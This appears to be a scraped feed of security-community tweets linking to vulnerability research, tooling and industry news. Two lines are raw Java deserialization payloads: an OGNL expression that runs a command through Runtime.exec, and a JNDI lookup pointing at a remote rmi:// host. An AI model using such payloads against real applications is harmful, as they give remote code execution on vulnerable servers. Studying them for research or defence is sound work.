Thanks to Ron Bowes (defunct) and Erick Galinkin for their research and analysis. rapid7.com/blog/post/2022…

Should I step down as head of Twitter? I will abide by the results of this poll.

GitHub - MaximeBeasse/KeyDecoder: KeyDecoder app lets you use your smartphone or tablet to decode your mechanical keys in seconds. github.com/MaximeBeasse/K…

Today, DoNotPay is launching a chatGPT extension that reads the Terms and Conditions, leases and flags anything that is non-standard to all our customers

Had some fun with OGNL sandboxes last year. Read how I bypassed Atlassian Confluence and Struts ones in my latest blog post github.blog/2023-01-27-byp…

If you're affected by the recent NCC workforce cut and you still 💕 appsec consulting, we're still hiring Doyensec doyensec.com/careers.html (US based) #onemore #appsec

This is my comprehensive blog <Apache SCXML Remote Code Execution> pyn3rd.github.io/2023/02/06/Apa…

It is with profound sadness that we mourn the loss of our friend and mentor, [email protected]. Kelly had an indomitable spirit, and our world is a bit darker without her.

‼️A Chinese certificate authority ("HiCA", www1.hi.cn/en/) is injecting arbitrary commands into the ACME challenge process, which acme.sh then executes on the client machine. Here's my current analysis: github.com/acmesh-officia…

So I just woke up and apparently I inadvertently discovered a zero-day RCE in acme.sh, and caused a Chinese CA to shut down overnight. Props to the neilpangxa of acme.sh for the quick fix! github.com/acmesh-officia…

How Relational Databases Work. This post talks about how indexes and transactions work on the inside of relational databases. architecturenotes.co/things-you-sho…

If you want to truly understand #AWS, you need to learn how it fails. Then you can design things to work around failure. Everything fails, all the time :) Something I cover extensively in my learn.cantrill.io courses .. is failure & resilience :) Please Retweet!

I remember when Apple proposed their CSAM scanning system in 2021, there were a lot of people complaining about the “slippery slope fallacy” and how we couldn’t just assume that content scanning would be expanded to other purposes. 23 months later: therecord.media/senate-dea-bil…

I “jailbroke” a Google Nest Mini so that you can run your own LLM’s, agents and voice models. Here’s a demo using it to manage all my messages (with help from Beeper) 🔊 on, and wait for surprise guest! I thought hard about how to best tackle this and why, see 🧵

{"Xavier":"com.opensymphony.xwork2.validator.validators.RequiredStringValidator","trimExpression":"%{(Java.lang.Runtime@getRuntime().exec('mspaint'))}"}

{"Xavier":"org.apache.commons.mail.SimpleEmail","mailSessionFromJNDI":"rmi://hehe:1099/obj"}

UHFKILL via Lab401 lab401.com/products/uhfki… The UHF RFID deactivation tool.Wirelessly and permanently disable UHF tags.A must have for OpSec/Operational Teams to deactivate tags embedded in clothing, shoes and products that can be used for tracking, identification and detection.

Datadog's security team has just released KubeHound, an open-source attack mapping tool for Kubernetes clusters securitylabs.datadoghq.com/articles/kubeh… kubehound.io Comes with 25 attack types, each one comes with step by step instructions of how to exploit it

Very slick. And a good reminder to keep car keys in a Faraday pouch when not using them

speech and writing are just serialization for human thoughts #showerthoughts